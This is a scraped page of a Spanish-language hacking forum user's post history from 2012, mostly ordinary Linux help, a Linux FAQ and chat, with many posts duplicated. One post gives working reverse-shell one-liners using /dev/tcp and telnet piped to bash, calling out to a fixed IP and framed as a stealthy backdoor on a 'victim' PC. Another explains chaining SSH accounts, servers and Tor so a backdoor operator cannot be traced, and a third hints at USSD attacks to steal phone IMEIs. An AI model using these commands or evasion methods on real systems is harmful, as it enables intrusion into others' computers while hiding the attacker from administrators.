106
Dudas Generales / Re:¿Que es el ssh-hostkey??
« en: Septiembre 30, 2012, 04:02:28 pm »el ssh-hostkey es la clave que se genera al instalarse, es decir, es su clave publica, si no me equivocoSi precisamente eso es.
Cargando
Mostrar Mensajes
Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.
107
Seguridad informatica / Re:Ocultar IP en conexion inversa
« en: Septiembre 30, 2012, 03:53:40 pm »
Por supuesto que si, pero los sistemas no suelen guardar log sobre IP a las que se conectan ellos sino mas bien a las que se conectan a ellos, pero claro si esta un administrador ahi a la hora de estar el backdoor en marcha o la conexion establecida es totalmente posible rastrearte, bastaria con un netstat -an tendrian tu IP, pero para resolver esto podrias usar cuentas ssh de shell gratuitas mas algun vps o servidor en si que tengas en algun lugar.
Por ejemplo, digamos que tienes una cuenta ssh en un servidor A, le llamamos a esta cuenta A (esta podria ser una cuenta gratuita en un servidor por ahi), luego tienes otra en un servidor B (en tu servidor), entonces primero te conectas al servidor A y desde este conectas al servidor B que es el tuyo y es donde tienes un puerto a la escucha de tu backdoor, puedes usar cuantas cuentas ssh como quieras, asi seria mas dificil dar contigo, ya que primero te conectas a un servidor que esta en otro pais probablemente y que no cedera facilmente a dar tu IP de donde te conectas y luego entras a tu servidor desde ahi (el cual nunca sabra tu IP real debido a como te conectas), para ser mas paranoico podrias conectarte al servidor A usando tor, asi si que seria dificil dar contigo, porque por ejemplo, en la maquina victima la IP que verian seria la del servidor A, pero en este la que verian seria la del servidor B y en el servidor B la que verian seria de tor.
Bastante paranoico mi metodo, pero mejor asi que terminar en la carcel, eso si necesitaras una buena conexion para eso, en vez de tor podrias usar alguna vpn y podrias usar mas servidores ahi si quisieras xD
Edit: Un diagrama para dianificar el asunto
Saludos!
Por ejemplo, digamos que tienes una cuenta ssh en un servidor A, le llamamos a esta cuenta A (esta podria ser una cuenta gratuita en un servidor por ahi), luego tienes otra en un servidor B (en tu servidor), entonces primero te conectas al servidor A y desde este conectas al servidor B que es el tuyo y es donde tienes un puerto a la escucha de tu backdoor, puedes usar cuantas cuentas ssh como quieras, asi seria mas dificil dar contigo, ya que primero te conectas a un servidor que esta en otro pais probablemente y que no cedera facilmente a dar tu IP de donde te conectas y luego entras a tu servidor desde ahi (el cual nunca sabra tu IP real debido a como te conectas), para ser mas paranoico podrias conectarte al servidor A usando tor, asi si que seria dificil dar contigo, porque por ejemplo, en la maquina victima la IP que verian seria la del servidor A, pero en este la que verian seria la del servidor B y en el servidor B la que verian seria de tor.
Bastante paranoico mi metodo, pero mejor asi que terminar en la carcel, eso si necesitaras una buena conexion para eso, en vez de tor podrias usar alguna vpn y podrias usar mas servidores ahi si quisieras xD
Edit: Un diagrama para dianificar el asunto
108
Phreak / Re:Capturar IMEI Remotamente Android
« en: Septiembre 30, 2012, 09:18:37 am »
Hola, la verdad es que si hay formas de hacerlo dependiendo del terminal claro, por ejemplo, los androids algunos de ellos son vulnerables a la ejecucion de codigo USSD desde una fuente externa al movil, por ejemplo ejecutar cierto codigo al entrar a un link y esas cosas, ahi igual podrias meter el codigo en javascript a un codigo QR y pwned! Mira por ejemplo, el codigo que es *#06# que sirve para ver precisamente el IMEI de un movil es un codigo USSD, pero claro esas cosas no la vas a encontrar hechas por ahi, si te entiresa lo que sigue es investigar sobre USSD, vulnerabilidad USSD en Android y esas cosas. Como dije depende del terminal, hasta ahora se conoce una vulnerabilidad en Android al respecto que es lo que decia antes.
Edit: Mas bien hay formas de ejecutar codigo desde el navegador al telefono, pero ya de ahi ha lograr k te llega a ti esa info es otro rollo, habria curiosear a ver o usar ingenieria social =P
Gr33tz!
Edit: Mas bien hay formas de ejecutar codigo desde el navegador al telefono, pero ya de ahi ha lograr k te llega a ti esa info es otro rollo, habria curiosear a ver o usar ingenieria social =P
Gr33tz!
109
Hacking / [Hack-Tip] Netcat sin netcat =)
« en: Septiembre 30, 2012, 07:56:06 am »
Hola, pues eso, mostrare un ligero truco que aprendi no hace mucho en un video que tambien les dejare, es una forma de conectarse desde un Sistema Linux a otro ordenador que ya tengas en escucha en algun puerto en especifico, tal cual como obtienes una reverse shell con netcat, solo que asi hariamos que la PC de la victima se conectara hacia nosotros sin usar el netcat propiamente. Esto tiene su ventaja y ya que es una simple linea de codigo bash se podria usar hasta en cualqueir programa sencillo o script para crear un backdoor, sin preocuparnos de si la victima tiene el netcat o no, claro ademas sabiendo de que si se usara el netcat en la PC victima para esto si este lo viera en los procesos del Sistema inmediatamente tumbaria la conexion, aunque claro de ambas formas con un netstat -an se puede detectar la conexion. Solo que si se hace un px aux si se esta usando el netcat el proceso sale con el nombre de netcat obviamente lo que mosquearia al usuario (vctima en este caso.
El truco es como sigue:
Asi de simple, en tu PC pones a la escuchas el netcat y el PC victima se conecta a ti, suponiendo que tu IP es 173.214.173.151, clao el puerto se puede cambiar.
Otro metodo es el siguiente, aunque este no lo he probado:
Claro, estamos suponiendo que tu IP es 173.214.173.151. Como pueden ver, es muy simple, muy util y se podria usar para muchas cosas o mas bien en muchas cosas, el resto depende de ustedes, pero recuerden: Do not be Evil!
Aqui les dejo el video donde aprendi eso hace un tiempo y recomiendo que se subscriban, es un buen show (de hacking claro) y a veces muestran cosas muy interesantes.
Saludos!
El truco es como sigue:
Código: [Seleccionar]
Hacker: nc -l -n -vv -p 8080
Victima: /bin/bash -i > /dev/tcp/173.214.173.151/8080 0<&1 2>&1Asi de simple, en tu PC pones a la escuchas el netcat y el PC victima se conecta a ti, suponiendo que tu IP es 173.214.173.151, clao el puerto se puede cambiar.
Otro metodo es el siguiente, aunque este no lo he probado:
Código: [Seleccionar]
Hacker: nc -l -n -vv -p 8080
Hacker: nc -l -n -vv -p 8888
Victim: telnet 173.214.173.151 8080 | /bin/bash | telnet 173.214.173.151 8888 Claro, estamos suponiendo que tu IP es 173.214.173.151. Como pueden ver, es muy simple, muy util y se podria usar para muchas cosas o mas bien en muchas cosas, el resto depende de ustedes, pero recuerden: Do not be Evil!
Aqui les dejo el video donde aprendi eso hace un tiempo y recomiendo que se subscriban, es un buen show (de hacking claro) y a veces muestran cosas muy interesantes.
110
GNU / Linux / Re:F.A.Q. de la sección
« en: Septiembre 30, 2012, 07:17:52 am »
Q: ¿Cómo instalar Debian GNU/Linux cifrando todas las particiones?
A: Sigue este tutorial Instalar Debian GNU/Linux con particiones cifradas.
Q: He instalado Debian pero ahora ¿Que hacer para tener los controladores de video, sonido y todo eso?
A: Bien si, ahora es muy posbible que necesites cambiar los repositorios e instalar algunos codecs de audio y video, mas otras cosas que podrian serte util, para eso podrias vistar este link.
Q: ¿Dónde puedo descargar alguna distro Linux y algunas versiones antiguas?
A: Todas las distros Linux tienen sus espeficicas paginas webs dond puedes encontrat links de descargas, asi que puedes encontrarlos facilmente buscando en Google, para la descarga de versiones antiguas y recientes de la amyoria de distro sigue este enlace.
Q: Ya he instalado una distro Linux ahora ¿Que sigue?
A: Pues lo ideal es que aprendas a manejar la linea de comandos, para ello puedes mirar en este link y leer en la wiki de Debian, Ubuntu, Arch y tales que suelen tener muy buen documentacion, muchas otras cosas las ira aprendiendo conforme se te pesente la necesidad.
Q: ¿Y sino quiero perder mi windows porque lo necesito para algo, que podria hacer si tambien quiero tener Linux?
A: Simple, para ello puedes instalar la distro junto a tu windows en alguna particion, asi cuando inicies el PC te saldra una pantalla que te pedira que elijas con que Sistema Operativo quieres iniciar. Esto es a lo que le llama arranque dual. Lo ideal es que crees una particion desde el windows y la deje sin formato, luego cuando empieces a instalar la Distro Linux la instalas en esa particion.
Q: Acabo de instalar BackTrack ahora ¿Como aprendo a usarlo?
A: Lo primero es que BackTrack es una distro Linux, por lo cual si sabes usar Linux podras manejarte bien en BackTrack, ahora bien, debido a que esta es una distro especializada para la Seguridad Informática hay programas muy espeficicos que podrian convenirte aprender a usarlos, para ello lo ideal es que leas en su wiki en las FAQ de ellos si necesitas y qeu te sirva de consejo cuando necesites saber algo ir siempre a la documentacion oficial. Aqui te dejo el link de la wiki de BackTrack.
Q: Como instalar BackTrack con particiones cifradas?
A:Para eso puedes ir a Aprende a encriptar completamente un sistema Linux (BackTrack) una vez instalado donde se explica como cifrar las particiones del BackTrack.
A: Sigue este tutorial Instalar Debian GNU/Linux con particiones cifradas.
Q: He instalado Debian pero ahora ¿Que hacer para tener los controladores de video, sonido y todo eso?
A: Bien si, ahora es muy posbible que necesites cambiar los repositorios e instalar algunos codecs de audio y video, mas otras cosas que podrian serte util, para eso podrias vistar este link.
Q: ¿Dónde puedo descargar alguna distro Linux y algunas versiones antiguas?
A: Todas las distros Linux tienen sus espeficicas paginas webs dond puedes encontrat links de descargas, asi que puedes encontrarlos facilmente buscando en Google, para la descarga de versiones antiguas y recientes de la amyoria de distro sigue este enlace.
Q: Ya he instalado una distro Linux ahora ¿Que sigue?
A: Pues lo ideal es que aprendas a manejar la linea de comandos, para ello puedes mirar en este link y leer en la wiki de Debian, Ubuntu, Arch y tales que suelen tener muy buen documentacion, muchas otras cosas las ira aprendiendo conforme se te pesente la necesidad.
Q: ¿Y sino quiero perder mi windows porque lo necesito para algo, que podria hacer si tambien quiero tener Linux?
A: Simple, para ello puedes instalar la distro junto a tu windows en alguna particion, asi cuando inicies el PC te saldra una pantalla que te pedira que elijas con que Sistema Operativo quieres iniciar. Esto es a lo que le llama arranque dual. Lo ideal es que crees una particion desde el windows y la deje sin formato, luego cuando empieces a instalar la Distro Linux la instalas en esa particion.
Q: Acabo de instalar BackTrack ahora ¿Como aprendo a usarlo?
A: Lo primero es que BackTrack es una distro Linux, por lo cual si sabes usar Linux podras manejarte bien en BackTrack, ahora bien, debido a que esta es una distro especializada para la Seguridad Informática hay programas muy espeficicos que podrian convenirte aprender a usarlos, para ello lo ideal es que leas en su wiki en las FAQ de ellos si necesitas y qeu te sirva de consejo cuando necesites saber algo ir siempre a la documentacion oficial. Aqui te dejo el link de la wiki de BackTrack.
Q: Como instalar BackTrack con particiones cifradas?
A:Para eso puedes ir a Aprende a encriptar completamente un sistema Linux (BackTrack) una vez instalado donde se explica como cifrar las particiones del BackTrack.
111
GNU / Linux / Re:Descargar distros GNU/Linux versiones recientes y antiguas =)
« en: Septiembre 30, 2012, 07:04:10 am »Oye Neutron que opinas de la distrubucion Pinguy OS??Perdon Zoro, no habia visto tu pregunta, es que ando medio despitado a veces :x Honestamente no la conozco Zoro, asi que mucho no podria decirte, pero a juzgar por lo que he visto en su pagina web, se ve bien, tiene una interfaz de usuario muy intuitiva para aquellos para lo que eso es importante. Claro eso tambien abstrae mucho al usuario, por lo que si la idea es aprender es mejor usar algo un poco mas "rudo", Debian, Arch por ejemplo estarian bien o Gentoo si ya sabes algo y tienes mucho tiempo para andar compilando, etc.
a y gracias por aportar...
...Saludos
Un saludo!
112
Off-Topic / Re:¡¡¡Feliz Cumpleaños Franky508!!!
« en: Septiembre 30, 2012, 06:43:57 am »Felia cumple bro que te la pases muy bien...
113
Ingenieria Inversa / Re:AYUDA NECESITO CREAR UN PROGRAMA
« en: Septiembre 30, 2012, 06:40:28 am »
Pues hay mas de un problema ahi, quieres hacer algo que no sabes hacer y al parecer no has pedido documentacion al respecto, para ser mas claro Que quieres? Que alguien haga eso por ti? Que te digan que estudiar? o que te pasen documentacion?
Otra cuestion, lo normal es que cuando entras nuevo a un foro como este te presentas en la seccion de presentacion y que te leas las reglas. Por ejemplo, algo que es de muy mal gusto es escribir todo en mayuscula como has hecho en el titulo, porque eso es sinonimo de que estas gritando. Son consejos para crecer amigo. Ahora espero que respondas a lo que pregunte arriba, de esa manera sabiendo que quieres exactamente sera mas facil que te puedan ayudar.
Un saludo!
Otra cuestion, lo normal es que cuando entras nuevo a un foro como este te presentas en la seccion de presentacion y que te leas las reglas. Por ejemplo, algo que es de muy mal gusto es escribir todo en mayuscula como has hecho en el titulo, porque eso es sinonimo de que estas gritando. Son consejos para crecer amigo. Ahora espero que respondas a lo que pregunte arriba, de esa manera sabiendo que quieres exactamente sera mas facil que te puedan ayudar.
Un saludo!
114
Programación Web / Re:como monto mi servidor?? [DUDAS]
« en: Septiembre 30, 2012, 04:46:42 am »Interesante lo que leo,yo ahora estoy dandole al "webgoat" pero me parece como un poco enlatado,si me decidiera por "Xammp" o alguno de estos servers para Lan ¿tendria que montar una web y los servicios correspondientes? o traen instalado un entorno de practicas........No tienes que instalar nada, por eso se caracterizan, traen el apache, el mysql y php5 ahora, con varios modulos y demas, solo es agregar el contenido y esas cosas y ya tienes un servidor, claro no un servidor de produccion sino mas bien de prueba, tener eso en cuenta.
Saludos¡¡¡¡
Saludos!
115
Programación Web / Re:como monto mi servidor?? [DUDAS]
« en: Septiembre 29, 2012, 10:44:29 am »
Para practicas asi y esas cosas yo uso el xampp en Linux, la verdad que no hay complicacion con ese. Lo recomiendo.
Saludos!
Saludos!
116
GNU / Linux / Re:Cliente de correos constante y en segundo plano
« en: Septiembre 29, 2012, 02:36:29 am »
Creo que un script te basta para eso, mira te dejo un link aqui, eso si no lo he comprado no se si funciona aun, porque a veces hacen cambios en el modo de autentificacion y eso que impide autentificarse asi de simple como esta en el link que te paso, sucedio con twiter asi. Aca el link Revisar si tenemos correos nuevos en GMAIL desde la terminal de Linux.
Saludos!
Saludos!
117
Dudas Generales / Re:[Ayuda]IRCplus
« en: Septiembre 28, 2012, 06:55:37 am »
Bueno de lo segundo desconezco no he usado ese IRCplus y menos para eso, pero supongo que debe ser porque no estas autentificado como usuario registrado o algun asunto de esos. En fin, pero de lo primero eso si se que es posible...como hacerlo pues te tocara investigar, nunca lo he probado y no encuentro la fuente de donde lei algo al respecto, esta en un libro en ingles de irc hacking que tampoco recuerdo, so google it xD
Saludos!
Saludos!
118
GNU / Linux / Re:Que hacer despues de instalar Debian 6 (COMPLETISIMO)
« en: Septiembre 23, 2012, 04:23:11 pm »119
Hacking / Re:¿cierto o incierto el hacking hoy en dia?
« en: Septiembre 22, 2012, 07:21:02 pm »
Honestamente no entendi muy bien tu pregunta o inquietud, entrar a una PC en ese contexto que diste no es dificil, pero eso no te hace hacker, la palabra hacker tiene un significado profundo y enigmatico, pero digamos que si accedes a una PC en ese contexto que has dicho eso no te hace hacker como decia antes, solo un posible script kiddie, el asunto es saber como funcionan las cosas a su nivel mas bajo y poder modificarlas para bien o mal, por ejemplo no te hace hacker rootear un servidor con un exploit que te descargaste de por ahi si ni siquieras entiendes como funcionan estos a bajo nivel (sino tienes las habilidades de poder hacer uno). Nada mas cabe decir, que la mayoria que andamos en estos foros somos simples aprendices y a veces en peores casos script kiddies solo creyendose en ocasiones ser hackers por defacear una web usando metodos que memorizaron sin saber como funcionan las cosas en realidad, usando metasploit y otras tools desarrolladas por verdaderos hackers, etc.
El asunto es saber programacion, conocer protocolos a fondo y tener la capacidad de modificar cosas, de cambiar el funcionanmientos de estos, etc. Claro no es que un hacker debe saberlo todo, puede ser un experto en telecomunicaciones y no saber nada programacion, etc. Eso es lo que yo pienso....hay que aprender de la forma dura (the hard way).
Saludos!
El asunto es saber programacion, conocer protocolos a fondo y tener la capacidad de modificar cosas, de cambiar el funcionanmientos de estos, etc. Claro no es que un hacker debe saberlo todo, puede ser un experto en telecomunicaciones y no saber nada programacion, etc. Eso es lo que yo pienso....hay que aprender de la forma dura (the hard way).
Saludos!
120
Off-Topic / Re:Informatico Con Insomnio
« en: Septiembre 21, 2012, 08:23:40 pm »jajaja, muy buenoJa ja, el LoboOscuro sabe bastante hasta donde se Facu, solo esta trolleando, es un troll profesional xD
LoboOscuro, necesitas saber programación
Saludos familia!
